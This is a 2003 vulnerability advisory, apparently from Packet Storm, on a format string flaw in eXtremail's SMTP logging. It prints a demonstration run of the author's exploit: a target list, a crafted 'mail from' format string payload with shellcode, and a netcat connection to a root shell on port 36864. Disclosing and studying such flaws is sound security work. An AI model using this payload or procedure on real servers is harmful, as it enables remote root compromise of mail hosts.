Linux eXtremail versions 1.5-8 and below hold a format string vulnerability in its logging mechanism. Exploiting this can allow for arbitrary code execution or a denial of service on the server.
9f300aec91de3f79ec8ad7dea040e62aded97cd4340b3ea05a7067bc03e93163-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Remote Vulnerabilities in eXtremail Server.
===========================================
Date: 02.07.2003
Email: B-r00t <br00t@blueyonder.co.uk>
Reference: http://www.extremail.com/
Versions: Linux eXtremail-1.5-8 => VULNERABLE
Linux eXtremail-1.5-5 => VULNERABLE
Exploit: eXtreme.c
eXtreme is a Unix mailserver, providing SMTP (port25), POP3 (port 110)
and IMAP(port 143) services. The latest versions of which are still
vulnerable to Format Strings vulnerabilities as discovered previously.
http://www.securityfocus.com/bid/2908/info/
eXtremail contains a format string vulnerability in it's logging
mechanism. It is possible for users to send SMTP commands argumented with
maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability,
remote attackers can gain superuser access on the underlying host. It is
also possible to crash eXtremail. If it is not restarted automatically, a
denial of SMTP service will result.
These vulnerabilities were apparently fixed in version 'eXtremail 1.1.10',
however they seem to have emerged in the latest versions.
Attached exploit [eXtreme.c] for latest versions of eXtremail.
$ gcc -o eXtreme eXtreme.c
$ ./eXtreme
eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003
Usage: eXtreme [IP_ADDRESS] [TARGET]
Example: eXtreme 10.0.0.1 2
0 RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)
1 Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)
2 Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
3 eXtremail V1.5 DEBUG
On success a r00tshell will be spawned on port 36864.
$ ./eXtreme 192.168.0.50 2
eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003
Connected to 192.168.0.50
Recv: 220 localdomain eXtremail V1.5 release 7 ESMTP server ready ...
Send: HELO Br00t~R0x~Y3r~W0rld!
Recv: 250 Hi, I am localdomain
System type: Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
Write Addy: 0xbefff0c8
RET (shellcode): 0xbefff1d4
PAD (alignment): 1
Payload: 254 / 266 max bytes
Sending it ...
Send: mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^) F@
F@ /bin/shCf Vf VfC?)?A?AV v
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
Connection to 192.168.0.50 36864 port [tcp/*] succeeded!
id; uname -a;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux
- --
B#.
- ----------------------------------------------------
Email : B-r00t <br00t@blueyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)
iD8DBQE/AitlrVael3EBVGIRAmIQAKCNyf8dsUV9Fw3WIFL7o64UDRTnmgCgpY39
HBOcgtG6P1BPhcxYzG/AoAM=
=GHV2
-----END PGP SIGNATURE-----
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed